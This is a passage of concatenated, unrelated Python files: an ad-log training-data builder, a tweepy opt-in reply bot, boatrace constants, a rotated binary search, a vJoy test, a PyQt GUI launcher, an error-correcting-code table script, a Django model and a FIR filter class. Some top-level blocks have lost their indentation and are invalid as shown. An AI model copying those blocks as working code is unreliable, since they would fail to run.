        'gender': 'gender', 'area': 'area', 'status': 'status',
        'education': 'education', 'consuptionability': 'consuptionAbility',
        'os': 'device', 'work': 'work', 'connectiontype': 'connectionType',
        'behavior': 'behavior',
    }
    train.loc[:, 'age'] = 'all'
    for column in column_map.values():
        train.loc[:, column] = 'all'
    if ope[ope['changeField'] == 3].shape[0] != 0:
        inpeo = ope[ope['changeField'] == 3]['changeValue'].values[0]
        # changeValue looks like 'field:v1,v2|field:v1|...'
        for fea in inpeo.split("|"):
            l = fea.split(':')
            if len(l) < 2:
                continue
            feas = l[1].split(',')
            feas.sort()
            feature = ','.join(feas)
            key = l[0].lower()
            if key == 'age':
                if len(feas) < 100:  # guard against malformed huge lists
                    train.loc[:, 'age'] = feature
            elif key in column_map:
                train.loc[:, column_map[key]] = feature
    # --- initial putting-time schedule ------------------------------------
    # BUG FIX: the original read changeValue.values[0] *before* checking
    # that a changeField == 4 record exists (IndexError on ads without
    # one), and wrote `train.loc['puttingTime']`, which appends a ROW
    # labelled 'puttingTime' instead of filling the column.
    inti_rows = ope[ope['changeField'] == 4]
    if inti_rows.shape[0] == 0:
        train.loc[:, 'puttingTime'] = '281474976710655'  # all 48 bits set
    else:
        putting = inti_rows['changeValue'].values[0].split(',')
        if len(putting) != 7:
            train.loc[:, 'puttingTime'] = '281474976710655'
        else:
            # One mask per weekday, indexed by the 'week' column (0-6).
            for wd in range(7):
                train.loc[train['week'] == wd, 'puttingTime'] = putting[wd]
    return train
def changeBid(train, operate):
    """Apply mid-flight bid changes (optionType 1, changeField 2).

    After each bid-change operation, every row logged later than the
    operation time receives the new bid value; later operations override
    earlier ones.

    Returns the modified `train`.
    """
    print("changebid processing")
    option = operate[operate['optionType'] == 1]
    opbid = option[option['changeField'] == 2]
    if opbid.shape[0] == 0:
        return train
    opbid.index = opbid['statime']
    # BUG FIX: sort_index() is not in-place; the original discarded the
    # sorted result, so overlapping bid changes could apply out of order.
    opbid = opbid.sort_index()
    opbid.index = range(opbid.shape[0])
    values = opbid['changeValue']
    optime = opbid['statime'].values
    j = 0
    for ti in optime:
        before = train[train['statime'] <= ti]
        after = train[train['statime'] > ti]
        after.loc[:, 'adBid'] = int(values[j])
        train = pd.concat([before, after])
        j += 1
    gc.collect()
    print(train.shape)
    return train
def changePeo(train, operate):
    """Apply mid-flight audience retargeting (optionType 1, changeField 3).

    For each retargeting operation, rows logged after the operation time
    are reset to the 'all' defaults and then overwritten with the newly
    specified audience fields parsed from changeValue
    ('field:v1,v2|field:v1|...').

    Returns the modified `train`.
    """
    option = operate[operate['optionType'] == 1]
    oppeo = option[option['changeField'] == 3]
    if oppeo.shape[0] == 0:
        return train
    print("changepeo processing")
    oppeo.index = oppeo['statime']
    # BUG FIX: sort_index() is not in-place; the sorted result was discarded.
    oppeo = oppeo.sort_index()
    oppeo.index = range(oppeo.shape[0])
    values = oppeo['changeValue']
    optime = oppeo['statime'].values
    # Columns addressed by the lower-cased field names in changeValue.
    column_map = {
        'gender': 'gender', 'area': 'area', 'status': 'status',
        'education': 'education', 'consuptionability': 'consuptionAbility',
        'os': 'device', 'work': 'work', 'connectiontype': 'connectionType',
        'behavior': 'behavior',
    }
    j = 0
    for ti in optime:
        before = train[train['statime'] <= ti]
        after = train[train['statime'] > ti]
        # Rows after the operation restart from the defaults.
        after.loc[:, 'age'] = 'all'
        for column in column_map.values():
            after.loc[:, column] = 'all'
        # BUG FIX: the original iterated over the changeValue *string* and
        # kept only its first character, so the parsed settings were
        # effectively never applied.
        inpeo = str(values[j])
        for fea in inpeo.split("|"):
            l = fea.split(':')
            if len(l) < 2:
                continue
            feas = l[1].split(',')
            feas.sort()
            feature = ','.join(feas)
            key = l[0].lower()
            if key == 'age':
                if len(feas) < 100:  # guard against malformed huge lists
                    after.loc[:, 'age'] = feature
            elif key in column_map:
                # BUG FIX: the original compared lower() against
                # 'Connectiontype' (capital C), which never matched.
                after.loc[:, column_map[key]] = feature
        train = pd.concat([before, after])
        j += 1
    gc.collect()
    print(train.shape)
    return train
def changeTime(train, operate):
    """Apply mid-flight putting-time changes (optionType 1, changeField 4).

    Rows logged after each operation get the weekday schedule parsed from
    the comma-separated, 7-field changeValue (one mask per weekday).

    Returns the modified `train`.
    """
    print("changeTime processing")
    option = operate[operate['optionType'] == 1]
    optm = option[option['changeField'] == 4]
    if optm.shape[0] == 0:
        return train
    optm.index = optm['statime']
    # BUG FIX: sort_index() is not in-place; the sorted result was discarded.
    optm = optm.sort_index()
    optm.index = range(optm.shape[0])
    values = optm['changeValue'].values
    optime = optm['statime'].values
    if len(values) == 0:
        return train
    j = 0
    for ti in optime:
        before = train[train['statime'] <= ti]
        after = train[train['statime'] > ti]
        putting = values[j].split(',')
        if len(putting) == 7:
            for wd in range(7):
                after.loc[after['week'] == wd, 'puttingTime'] = putting[wd]
        train = pd.concat([before, after])
        j += 1
    gc.collect()
    print(train.shape)
    return train
# ---------------------------------------------------------------------------
# Driver: replay each ad's operation history (status toggles, bid, audience
# and putting-time changes) onto its raw request-log rows, then aggregate
# them into per-(day, ad, bid, schedule) training samples.
# ---------------------------------------------------------------------------
option = pd.read_csv('../data/adoption_use3.csv')
# Normalise 'statime' from 'M_D_H_MIN' to zero-padded 'MMDDHHMM' so the
# timestamps compare chronologically as plain strings.
x = []
for i in option['statime'].values:
    m = i.split('_')
    if len(m) == 4:
        mon = m[0].zfill(2)
        day = m[1].zfill(2)
        h = m[2].zfill(2)
        mii = m[3].zfill(2)
        x.append(mon + day + h + mii)
    else:
        x.append('0')
option['statime'] = x
adstatic = pd.read_csv('../data/ad_static_feature.csv')
# BUG FIX: fillna() is not in-place; the original discarded both results,
# leaving the NaN values in the frames.
option = option.fillna('-1')
adstatic = adstatic.fillna('-1')
# Drop operations with no change time unless they are creation records
# (optionType == 2).
mask = ~((option['changeTime'] == 0) & (option['optionType'] != 2))
adoption = option[mask]
TotalTrain = pd.DataFrame()
for na in name:
    totalTrain = pd.DataFrame()
    logdata = pd.read_csv('../data/logdel/' + str(na) + '.csv')
    userdata = pd.read_csv('../data/user/user_' + str(na) + '.csv')
    createdata = pd.read_csv('../data/havecreate.csv')
    creAid = createdata['have'].unique()
    # Derive day / time-of-day / weekday / sortable-timestamp columns from
    # the request epoch seconds.
    day = []
    hour = []
    day_hour = []
    weekday = []
    for i in logdata['adRequestTime']:
        tt = time.localtime(i)
        mons = str(tt.tm_mon).zfill(2)
        days = str(tt.tm_mday).zfill(2)
        hou = str(tt.tm_hour).zfill(2)
        mmi = str(tt.tm_min).zfill(2)
        day.append(str(mons + '_' + days))
        hour.append(str(hou + '_' + mmi))
        d_h = str(mons + days + hou + mmi)
        day_hour.append(str(d_h))
        weekday.append(tt.tm_wday)
    logdata['Reqday'] = day
    logdata['week'] = weekday
    logdata['Reqhourmin'] = hour
    logdata['statime'] = day_hour
    # Replay the operation history ad by ad to build the training rows.
    ad = logdata['ad_id'].unique()
    for aid in ad:
        if aid not in creAid:
            continue  # no creation record: settings cannot be reconstructed
        aidlog = logdata[logdata['ad_id'] == aid]
        aidlog = pd.merge(aidlog, adstatic, on='ad_id', how='left')
        aidlog = pd.merge(aidlog, userdata, on='user_id', how='left')
        aidlog = aidlog.fillna('-1')
        train = aidlog.copy()
        option1 = adoption[adoption['ad_id'] == aid]
        # Ignore operations that predate the ad's creation, but always keep
        # the creation-time records themselves.
        ad_create_time = aidlog['create_time'].unique()[0]
        tt = time.localtime(ad_create_time)
        mons = str(tt.tm_mon).zfill(2)
        days = str(tt.tm_mday).zfill(2)
        hou = str(tt.tm_hour).zfill(2)
        mmi = str(tt.tm_min).zfill(2)
        cre_time = str(mons + days + hou + mmi)
        op1 = option1[option1['statime'] >= cre_time]
        op2 = option1[option1['optionType'] == 2]
        option = pd.concat([op1, op2])
        # Replay: drop disabled periods, apply initial settings, then the
        # chronological changes.
        train = disstatus(train, option)
        if (train.shape[0] == 0):
            continue
        train = initValue(train, option)
        train = changeBid(train, option)
        train = changePeo(train, option)
        train = changeTime(train, option)
        # One training row per (day, ad, bid, schedule) group; exposure is
        # the number of log rows in the group.
        grouped = train.groupby(['Reqday', 'ad_id', 'adBid', 'puttingTime'])
        for i in grouped:
            log = i[1][0:1]   # first row: representative static features
            log_all = i[1]    # all rows of the group
            train_i = pd.DataFrame()
            train_i['Reqday'] = [i[0][0]]
            train_i['ad_id'] = [i[0][1]]
            train_i['exposure'] = i[1].shape[0]
            # Dynamic features are aggregated over the whole group.
            train_i['adBid'] = np.mean(log_all['adBid'].values)
            time_int, time_two, time_total = putting_time_process(log_all['puttingTime'].unique())
            train_i['puttingTime_int'] = time_int
            train_i['puttingTime_two'] = time_two      # 48-char 0/1 mask
            train_i['puttingTime_total'] = time_total  # active slot count
            # Audience fields: union of the comma-separated values seen.
            train_i['age'] = group_split(log_all['age'].values)
            train_i['gender'] = group_split(log_all['gender'].values)
            train_i['area'] = group_split(log_all['area'].values)
            train_i['status'] = group_split(log_all['status'].values)
            train_i['education'] = group_split(log_all['education'].values)
            train_i['consuptionAbility'] = group_split(log_all['consuptionAbility'].values)
            train_i['device'] = group_split(log_all['device'].values)
            train_i['work'] = group_split(log_all['work'].values)
            train_i['connectionType'] = group_split(log_all['connectionType'].values)
            train_i['behavior'] = group_split(log_all['behavior'].values)
            # Static ad features: constant within the log, take the first row.
            train_i['ad_count_id'] = log['ad_count_id'].values[0]
            train_i['goods_id'] = log['goods_id'].values[0]
            train_i['goods_type'] = log['goods_type'].values[0]
            train_i['create_time'] = log['create_time'].values[0]
            train_i['ad_industry_id'] = log['ad_industry_id'].values[0]
            train_i['ad_size'] = log['adSize'].values[0]
            train_i['user_id'] = str(i[1]['user_id'].unique())
            train_i['adPosition_id'] = str(i[1]['adPosition_id'].unique())
            train_i['adPctr'] = np.mean(log['adPctr'].values)
            train_i['adQuality_ecpm'] = np.mean(log['adQuality_ecpm'].values)
            train_i['totalEcpm'] = np.mean(log['totalEcpm'].values)
            totalTrain = pd.concat([totalTrain, train_i])
    TotalTrain = pd.concat([TotalTrain, totalTrain])
    del totalTrain
    gc.collect()
TotalTrain.to_csv('TotalTrain_cpc.csv', index=False)
|
import tweepy
import json
import os.path
"""
read in auth data
"""
auth_data = None
with open('auth.json') as f:
auth_data = json.load(f)
f.close()
handle = auth_data['twitter_handle']
cons_key = auth_data['consumer_key']
cons_sec = auth_data['consumer_secret']
acc_tok = auth_data['access_token']
acc_tok_sec = auth_data['access_token_secret']
MSG_OPT_IN = 'opt-in'
MSG_OPT_OUT = 'opt-out'
MSG_AT = '@{}'.format(handle)
MSG_REPLY = 'Here\'s your custom message!'
"""
get opt-in from user
& opt-out
"""
FILE_USERS = 'users.json'
users = {}
# read in existing users
def readUsersFromFile() -> dict:
    """Load the user-id -> reply-count map from FILE_USERS.

    Returns an empty dict when the file does not exist.  (Fixed the
    return annotation: `-> {}` was an empty dict *literal*, not a type.)
    """
    users = {}
    if os.path.isfile(FILE_USERS):
        with open(FILE_USERS, 'r') as f:
            users = json.load(f)
    return users
def saveUsersToFile() -> None:
    """Persist the global `users` map to FILE_USERS as JSON.

    (Removed the redundant f.close(); `with` already closes the file.)
    """
    with open(FILE_USERS, 'w') as f:
        json.dump(users, f)
def addUser(userId: str) -> None:
    """Start tracking `userId` with a zero reply count and persist the map."""
    users[userId] = 0
    saveUsersToFile()
def removeUser(userId: str) -> None:
    """Stop tracking `userId` (no-op if unknown) and persist the map."""
    if userId in users:
        users.pop(userId)
        saveUsersToFile()
def incUserSent(userId: str) -> None:
    """Increment `userId`'s reply counter (if tracked) and persist the map."""
    if userId in users:
        users[userId] += 1
        saveUsersToFile()
"""
tweepy stuff
"""
auth = tweepy.OAuthHandler(cons_key, cons_sec)
auth.set_access_token(acc_tok, acc_tok_sec)
api = tweepy.API(auth)
user = api.me()
print('Bot running on {}'.format(user.name))
class StreamBoth(tweepy.StreamListener):
    """Single listener for two jobs: mentions of the bot that opt users
    in/out, and status updates from tracked users (which get an automatic
    reply).  `self.restart` signals the main loop to rebuild the stream
    after the tracked-user set changed.
    """
    def __init__(self):
        super().__init__()
        # Set to True whenever the user set changes; polled by the main loop.
        self.restart = False
    def on_connect(self):
        print('Streaming started with users {}'.format(list(users.keys())))
    def on_status(self, status):
        # for user opting in/out
        if MSG_AT in status.text:
            print('{} tweeted you!'.format(status.user.screen_name))
            if MSG_OPT_IN in status.text:
                print('{} opted in!'.format(status.user.screen_name))
                addUser(status.user.id_str)
                self.restart = True
            elif MSG_OPT_OUT in status.text:
                print('{} opted out!'.format(status.user.screen_name))
                removeUser(status.user.id_str)
                self.restart = True
        # for tracked user tweeting
        elif status.user.id_str in list(users.keys()):
            print('Tweeted @{}'.format(status.user.screen_name))
            # Reply with the template plus the user's running reply count.
            api.update_status('@{} {} #{}'.format(status.user.screen_name, MSG_REPLY, users[status.user.id_str]), status.id_str)
            incUserSent(status.user.id_str)
"""
let's do stuff
"""
users = readUsersFromFile()
if not users:
print('No users in users.json!')
streamList = StreamBoth()
stream = tweepy.Stream(auth = api.auth, listener=streamList)
stream.filter(track=MSG_AT, follow=users, is_async=True)
while True:
if streamList.restart:
print('User opted in/out; restarting...')
stream.disconnect()
# restart with new set of users
streamList = StreamBoth()
stream = tweepy.Stream(auth = api.auth, listener=streamList)
stream.filter(track=MSG_AT, follow=users, is_async=True)
|
from datetime import time
# --- URL constants for boatrace.jp pages ---
BOATRACEJP_MAIN_URL = 'https://www.boatrace.jp/'
BOATRACEJP_LOGIN_URL = f'{BOATRACEJP_MAIN_URL}owpc/pc/login?authAfterUrl=/'
BOATRACEJP_LOGOUT_URL = f'{BOATRACEJP_MAIN_URL}owpc/logout'
BOATRACEJP_BASE_URL = f"{BOATRACEJP_MAIN_URL}owpc/pc/race"
# Vote-bridge entry point (pieces concatenated for readability).
IBMBRACEORJP = (
    f'{BOATRACEJP_MAIN_URL}'
    'owpc/VoteBridgeNew.jsp?'
    'param=H0JS00000stContens'
    '&kbn=1'
    '&voteActionUrl=/owpc/pc/site/index.html'
)
# --- daily operating window ---
BOATRACE_START = time(hour=8, minute=30)   # 8:30
BOATRACE_END = time(hour=20, minute=45)    # 20:45
# --- race constants ---
NUM_RACES = 12  # races held at one stadium on a day
NUM_BOATS = 6   # boats per race
BOATS_GEN = range(1, NUM_BOATS + 1)
# (stadium number, stadium name) pairs, numbered from 1.
STADIUMS_MAP = tuple(enumerate([
    "桐生",
    "戸田",
    "江戸川",
    "平和島",
    "多摩川",
    "浜名湖",
    "蒲郡",
    "常滑",
    "津",
    "三国",
    "びわこ",
    "住之江",
    "尼崎",
    "鳴門",
    "丸亀",
    "児島",
    "宮島",
    "徳山",
    "下関",
    "若松",
    "芦屋",
    "福岡",
    "唐津",
    "大村",
], start=1))
NUM_STADIUMS = len(STADIUMS_MAP)
|
def binary_search(arr: list, left: int, right: int, key: int) -> int:
    """Iterative binary search over the inclusive range arr[left..right].

    Returns the index of `key`, or -1 when absent or the range is empty.
    """
    if left > right:
        return -1
    lo, hi = left, right
    while lo <= hi:
        middle = (lo + hi) // 2
        value = arr[middle]
        if value == key:
            return middle
        if value < key:
            lo = middle + 1
        else:
            hi = middle - 1
    return -1
def find_pivot(arr: list, left, right) -> int:
    """Return the rotation point (index of the smallest element) of a
    rotated ascending array with distinct elements, or -1 when the array
    is empty or not rotated.

    BUG FIX: the original read arr[mid + 1] without a bound check, which
    raised IndexError (after looping) on arrays that are NOT rotated,
    e.g. [1, 2, 3] or a single element.
    """
    if left > right or arr[left] <= arr[right]:
        # Empty range, or already in ascending order: no rotation point.
        return -1
    while left < right:
        mid = left + (right - left) // 2
        if arr[mid] > arr[right]:
            # Minimum lies strictly to the right of mid.
            left = mid + 1
        else:
            # Minimum is at mid or to its left.
            right = mid
    return left
def rotated_binary_search(arr: list, key: int) -> int:
    """Search `key` in a (possibly) rotated sorted array.

    Locates the rotation point first, then binary-searches the half that
    can contain `key`.  Returns the index or -1.
    """
    hi = len(arr) - 1
    pivot = find_pivot(arr, 0, hi)
    if pivot == -1:
        # Not rotated: a single plain binary search suffices.
        return binary_search(arr, 0, hi, key)
    if arr[pivot] == key:
        return pivot
    if key >= arr[0]:
        # Key belongs to the left (larger-values) segment.
        return binary_search(arr, 0, pivot - 1, key)
    return binary_search(arr, pivot + 1, hi, key)
def rotated_binary_search_1_pass(arr: list, key: int) -> int:
    """Single-pass binary search in a rotated sorted array of distinct
    elements.  At every step one half is sorted; probe it to decide which
    side to keep.  Returns the index of `key`, or -1.
    """
    lo, hi = 0, len(arr) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        if arr[mid] == key:
            return mid
        if arr[lo] <= arr[mid]:
            # Left half [lo, mid] is sorted.
            if arr[lo] <= key <= arr[mid]:
                hi = mid - 1
            else:
                lo = mid + 1
        else:
            # Right half [mid, hi] is sorted.
            if arr[mid] <= key <= arr[hi]:
                lo = mid + 1
            else:
                hi = mid - 1
    return -1
if __name__ == "__main__":
ARR = [5, 6, 7, 8, 9, 10, 1, 2, 3]
print(f"Search 7 in {ARR}: {rotated_binary_search_1_pass(ARR, 7)}")
print(f"Search 3 in {ARR}: {rotated_binary_search_1_pass(ARR, 3)}")
print(f"Search 9 in {ARR}: {rotated_binary_search_1_pass(ARR, 9)}")
print(f"Search 1 in {ARR}: {rotated_binary_search_1_pass(ARR, 1)}")
print(f"Search 0 in {ARR}: {rotated_binary_search_1_pass(ARR, 0)}")
|
# Steer Left - Left LS
# Steer Right - Right LS
# Manual smoke test for the vJoy virtual-joystick wrapper: sweeps the
# steering (X) axis to one extreme, then the other, recentres, and
# releases the device.
from vjoy import vJoy, ultimate_release
import time
vj = vJoy()
# Axis ranges used by the vJoy driver (X/Y centre at XYRANGE).
XYRANGE = 16393
ZRANGE = 32786
vj.open()
# (Disabled) throttle/brake sweep kept for reference:
# print('gass')
# time.sleep(2)
# joystickPosition = vj.generateJoystickPosition(wAxisZ = ZRANGE) # full throttle
# vj.update(joystickPosition)
# time.sleep(2)
# joystickPosition = vj.generateJoystickPosition(wAxisZ = 0) # throttle off
# vj.update(joystickPosition)
# print("bremz")
# time.sleep(2)
# joystickPosition = vj.generateJoystickPosition(wAxisZRot = ZRANGE) # full brake
# vj.update(joystickPosition)
# time.sleep(1)
# joystickPosition = vj.generateJoystickPosition(wAxisZRot = 0) # brake off
# vj.update(joystickPosition)
print("pa kreisi")
time.sleep(2)
# Steer to one extreme.  NOTE(review): the original comment said "full
# right" while the print above says "left" -- verify the axis polarity.
joystickPosition = vj.generateJoystickPosition(wAxisX = 0)
vj.update(joystickPosition)
time.sleep(1)
print("pa labi")
time.sleep(2)
# Steer to the opposite extreme.
joystickPosition = vj.generateJoystickPosition(wAxisX = ZRANGE)
vj.update(joystickPosition)
time.sleep(2)
# (Disabled) continuous sweep kept for reference:
# vj.open()
# lol = 0
# while True:
#     lol += 1
#     joystickPosition = vj.generateJoystickPosition(wAxisX = lol)
#     vj.update(joystickPosition)
#     if (lol > 32000):
#         lol = 0
# Recentre all axes, then release the virtual device.
joystickPosition = vj.generateJoystickPosition()
vj.update(joystickPosition)
time.sleep(0.001)
vj.close()
|
"""Extends crowddynamics commandline client with gui related commands"""
import logging
import sys
import click
from PyQt4 import QtGui, QtCore
from crowddynamics.logging import setup_logging
from qtgui.main import MainWindow
def run_gui(simulation_cfg=None):
    r"""Launches the graphical user interface for visualizing simulation.

    Args:
        simulation_cfg: Optional configuration handed to
            MainWindow.set_simulations() before the window is shown.
    """
    setup_logging()
    logger = logging.getLogger(__name__)
    logger.info('Starting GUI')
    app = QtGui.QApplication(sys.argv)
    win = MainWindow()
    if simulation_cfg:
        win.set_simulations(simulation_cfg)
    win.show()
    # Start Qt event loop unless running in interactive mode or using pyside.
    # NOTE(review): PyQt4 historically exposes exec_() rather than exec() --
    # confirm app.exec() exists in the PyQt4 build in use.
    if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
        app.exec()
    else:
        logger.warning("Interactive mode and pyside are not supported.")
    # Teardown runs after the event loop returns; sys.exit() ends the process.
    logging.info('Exiting GUI')
    logging.shutdown()
    win.close()
    app.exit()
    sys.exit()
# Root click command group; subcommands attach via @main.command().
@click.group()
def main():
    pass
# `run` subcommand; --simulation_file is an optional path forwarded to the GUI.
@main.command()
@click.option('--simulation_file', type=str, default=None)
def run(simulation_file):
    """Launch gui for crowddynamics"""
    # The docstring above doubles as the CLI help text shown by click.
    run_gui(simulation_file)
if __name__ == "__main__":
main()
|
import bokeh.sampledata
# Download bokeh's sample datasets into the local cache (network access).
bokeh.sampledata.download()
|
import numpy as np
def vecNum(vec):
    """Interpret a 0/1 vector as a big-endian binary number."""
    bit_string = "".join(str(int(component)) for component in vec)
    return int(bit_string, base=2)
def printBinary(mat, width):
    """Print each row of `mat` as a zero-padded binary literal, one per line."""
    for row in mat:
        print(f"0b{vecNum(row):0{width}b},")
def genToParityCheck(genParity):
    """Build the parity-check matrix [P^T | I] from the generator's parity
    part P (systematic code)."""
    transposed = genParity.transpose()
    identity = np.eye(transposed.shape[0])
    return np.hstack((transposed, identity))
# Systematic (17, 9) generator matrix [I | P]: identity on the left,
# parity part P in the last 8 columns.
gen = np.array([
    [1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0],
    [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0],
    [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1],
    [0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1],
    [0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1, 1],
    [0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1],
    [0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0],
    [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0],
    [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1],
])
# Parity portion P (last 8 columns).
parity = gen[:, -8:]
print("generator:")
printBinary(parity.transpose(), 9)
print("parity check:")
parityCheck = genToParityCheck(parity)
printBinary(parityCheck, 17)
# Enumerate correctable error patterns: a single-bit error rotated through
# all 17 positions, each combined with the last bit forced to 1 --
# presumably the decoder's pattern convention; verify against its consumer.
error = [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
syndromes = {}
for r in range(17):
    w = np.roll(error, r)
    w[-1] = 1
    s = (parityCheck @ w) % 2
    syndromes[vecNum(s)] = vecNum(w)
# All syndromes must fit in 8 bits to index a 256-entry lookup table.
for x in syndromes.keys():
    assert x < 256
print("syndrome/pattern mappings:")
for syn in range(256):
    try:
        print("\n0b{:017b},".format(syndromes[syn]))
    except KeyError:
        print("0, ", end="")
print()
|
# -*- coding: utf-8 -*-
from django.db import models
from datetime import datetime
class Feedback(models.Model):
    """User-submitted feedback entry with an optional admin answer."""
    # Submitter details -- both optional, with anonymous defaults.
    name = models.CharField('Name', max_length=50, default="Anonym", blank=True)
    email = models.EmailField('E-Mail', max_length=254, blank=True)
    # The feedback text itself (required) and the admin's reply.
    note = models.TextField('Anmerkung', max_length=1024, blank=False)
    answer = models.TextField('Antwort', max_length=1024, blank=True)
    author = models.CharField('Antwort von', max_length=50, default="Admin", blank=True)
    # Moderation flags: `archive` marks it handled, `public` controls visibility.
    archive = models.BooleanField('Bearbeitet?', default=False)
    public = models.BooleanField('Öffentlich?', default=True)
    # NOTE(review): datetime.now is timezone-naive; Django convention is
    # django.utils.timezone.now when USE_TZ is enabled -- confirm settings.
    created = models.DateTimeField('Erstellt am', default=datetime.now)
|
""" **Description**
A Finite Impulse Response ( FIR ) filter realizes a discrete difference
equation as a function of a forward coefficient array and a state array
of a specified order, consuming an incident signal and producing a
reference signal.
.. math::
y_{n} = \sum_{i = 0}^{N} b_{i,n} x_{n-i} = \sum_{i = 1}^{N} b_{i,n} s_{i,n} + b_{0,n} x_{n}
.. math::
s_{1,n+1} = x_{n}\qquad\quad s_{i,n+1} = s_{i-1,n}
A reset may minimize edge effects at a discontinuity by assuming
persistent operation at a specified incident signal condition.
.. math::
s_{i,n} = x_{n}
A frequency response is expressed as a function of a forward
coefficient array.
.. math::
H_{z,n} = \sum_{i = 0}^{N} b_{i,n} z^{-i}
A forward coefficient array and state array of a specified order are
defined to realize specified constraints. A style, frequency,
order, count, complement, and gain are electively specified.
Alternatively, a forward coefficient array and state array may be explicitly
defined to ignore constraints.
Frequency corresponds to a -3 dB frequency response normalized relative
to Nyquist.
Style is in ( 'Blackman', 'Hamming', 'Hann', 'Kaiser' ).
* | 'Blackman' filters demonstrate low resolution and spectral leakage
| with improved rate of attenuation.
* | 'Hamming' filters demonstrate minimal nearest side lobe magnitude
| response.
* | 'Hann' filters demonstrate high resolution and spectral leakage.
* | 'Kaiser' filters demonstrate flexible resolution and spectral
| leakage dependent upon a beta value of a Bessel function of the
| first kind, with beta equal to 7.0.
    Order must be even to ensure a Type I form linear phase solution.
Count is a quantity of filters of a specified order concatenated to
form an aggregate frequency response in cascade form.
Complement effectively constructs a mirror image of a specified
frequency response.
**Example**
::
from diamondback import FirFilter
import numpy
# Create an instance with constraints.
obj = FirFilter( style = 'Kaiser', frequency = 0.1, order = 32, count = 1 )
# Create an instance with coefficients.
obj = FirFilter( b = obj.b )
# Estimate frequency response, group delay, and roots.
y, f = obj.response( length = 8192, count = 1 )
y, f = obj.delay( length = 8192, count = 1 )
p, z = obj.roots( count = 1 )
# Filter an incident signal.
x = numpy.random.rand( 128 ) * 2.0 - 1.0
obj.reset( x[ 0 ] )
y = obj.filter( x )
**License**
`BSD-3C. <https://github.com/larryturner/diamondback/blob/master/license>`_
© 2018 - 2021 Larry Turner, Schneider Electric Industries SAS. All rights reserved.
**Author**
Larry Turner, Schneider Electric, Analytics & AI, 2018-01-23.
"""
from diamondback.interfaces.IB import IB
from diamondback.interfaces.IReset import IReset
from diamondback.interfaces.IS import IS
from typing import List, Tuple, Union
import math
import numpy
import scipy.signal
import warnings
class FirFilter( IB, IReset, IS ) :
""" Finite Impulse Response ( FIR ) filter.
"""
__style = ( 'Blackman', 'Hamming', 'Hann', 'Kaiser' )
def __init__( self, style : str = '', frequency : float = 0.0, order : int = 0, count : int = 1, complement : bool = False, gain : float = 1.0,
b : Union[ List, numpy.ndarray ] = [ ], s : Union[ List, numpy.ndarray ] = [ ] ) -> None :
""" Initialize.
Specify constraints including style, frequency, and order.
Alternatively, a forward coefficient array may be explicitly defined
to ignore constraints.
Labels should be used to avoid ambiguity between constraints and
coefficients.
Arguments :
style : str - in ( 'Blackman', 'Hamming', 'Hann', 'Kaiser' ).
frequency : float - relative to Nyquist in ( 0.0, 1.0 ).
order : int.
count : int.
complement : bool.
gain : float.
b : Union[ List, numpy.ndarray ].
s : Union[ List, numpy.ndarray ].
"""
if ( not len( b ) ) :
if ( ( not style ) or ( style not in FirFilter.__style ) ) :
raise ValueError( f'style = {style}' )
if ( ( frequency <= 0.0 ) or ( frequency >= 1.0 ) ) :
raise ValueError( f'Frequency = {frequency}' )
if ( order < 0 ) :
raise ValueError( f'Order = {order}' )
if ( count <= 0 ) :
raise ValueError( f'Count = {count}' )
if ( complement ) :
frequency = 1.0 - frequency
if ( style == 'Kaiser' ) :
window = ( style.lower( ), 7.0 )
else :
window = style.lower( )
beta, eps, error = 10.0, numpy.finfo( float ).eps, float( 'inf' )
index, mu, zeta = 500 * ( 1 + ( count > 2 ) ), 2.5e-2, 1.0
for _ in range( 0, index ) :
with warnings.catch_warnings( ) :
warnings.simplefilter( 'ignore' )
v = scipy.signal.firwin( order + 1, zeta * frequency, None, window, True, True, 1.0 )
if ( numpy.isnan( v ).any( ) ) :
raise ValueError( f'V = {v}' )
x = numpy.exp( 1j * math.pi * frequency )
e = ( 2.0 ** ( -0.5 ) ) - ( abs( numpy.polyval( v, x ) ) ** count )
if ( abs( e ) < error ) :
b, error = v, abs( e )
if ( error < ( 10.0 * eps ) ) :
break
zeta = numpy.maximum( zeta + mu * math.tanh( beta * e ), eps )
if ( complement ) :
b *= numpy.array( [ ( ( -1.0 ) ** x ) for x in range( 0, len( b ) ) ] )
b /= sum( b * numpy.array( [ ( ( -1.0 ) ** x ) for x in range( 0, len( b ) ) ] ) )
b *= gain
if ( ( not numpy.isscalar( b ) ) and ( not isinstance( b, numpy.ndarray ) ) ) :
b = numpy.array( list( b ) )
if ( not len( b ) ) :
raise ValueError( f'B = {b}' )
if ( ( not numpy.isscalar( s ) ) and ( not isinstance( s, numpy.ndarray ) ) ) :
s = numpy.array( list( s ) )
if ( len( b ) < len( s ) ) :
b = numpy.concatenate( ( b, numpy.zeros( len( s ) - len( b ) ) ) )
if ( len( s ) < len( b ) ) :
s = numpy.concatenate( ( s, numpy.zeros( len( b ) - len( s ) ) ) )
super( ).__init__( )
self.b, self.s = numpy.array( b ), numpy.array( s, type( b[ 0 ] ) )
def delay( self, length : int = 8192, count : int = 1 ) -> Tuple[ numpy.ndarray, numpy.ndarray ] :
""" Estimates group delay and produces a reference signal.
Arguments :
length : int.
count : int.
Returns :
y : numpy.ndarray - reference signal.
f : numpy.ndarray - relative to Nyquist in [ -1.0, 1.0 ).
"""
if ( length <= 0 ) :
raise ValueError( f'Length = {length}' )
if ( count <= 0 ) :
raise ValueError( f'Count = {count}' )
with warnings.catch_warnings( ) :
warnings.simplefilter( 'ignore' )
y, f = scipy.signal.group_delay( ( self.b, [ 1.0 ] ), length, True )[ 1 ], numpy.linspace( -1.0, 1.0 - 2.0 / length, length )
